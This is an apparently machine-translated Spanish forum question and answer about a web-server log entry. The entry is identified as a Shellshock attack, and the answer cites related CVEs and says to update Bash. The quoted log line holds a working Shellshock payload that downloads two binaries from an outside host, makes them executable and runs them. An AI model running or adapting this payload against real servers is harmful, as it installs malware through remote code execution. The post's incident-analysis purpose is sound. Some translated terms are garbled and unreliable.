Descubrimos binarios /tmp/susu1y /tmp/susu2ejecutados por el usuario del servidor web.
En los registros tenemos las siguientes entradas:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
Pero sólo encontramos los códigos de error 301, 302, 403, 404, 500 de dichas solicitudes. No hay código 200er que indique que el hack fue exitoso.
¿Es este un problema de seguridad común? ¿Cómo se puede arreglar? ¿O cómo se puede seguir su rastro?
Respuesta1
Esto parece un ataque de conmoción, se anunció por primera vez el 24 de septiembre de 2014 cuando bash lanzó la solución para este error.
de wikipedia sobre shock de guerra
El primer error hace que Bash ejecute comandos involuntariamente cuando los comandos se concatenan al final de las definiciones de funciones almacenadas en los valores de las variables de entorno.1[6] A los pocos días de la publicación de esto, un intenso escrutinio de los defectos de diseño subyacentes descubrió una variedad de vulnerabilidades relacionadas (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, y CVE-2014-7187); que Ramey abordó con una serie de parches adicionales.
Puede comprobar si su sistema es vulnerable como se explica en¿Cómo probar si mi servidor es vulnerable al error ShellShock?
Debe actualizar su sistema o al menos su versión de Bash para solucionar el problema.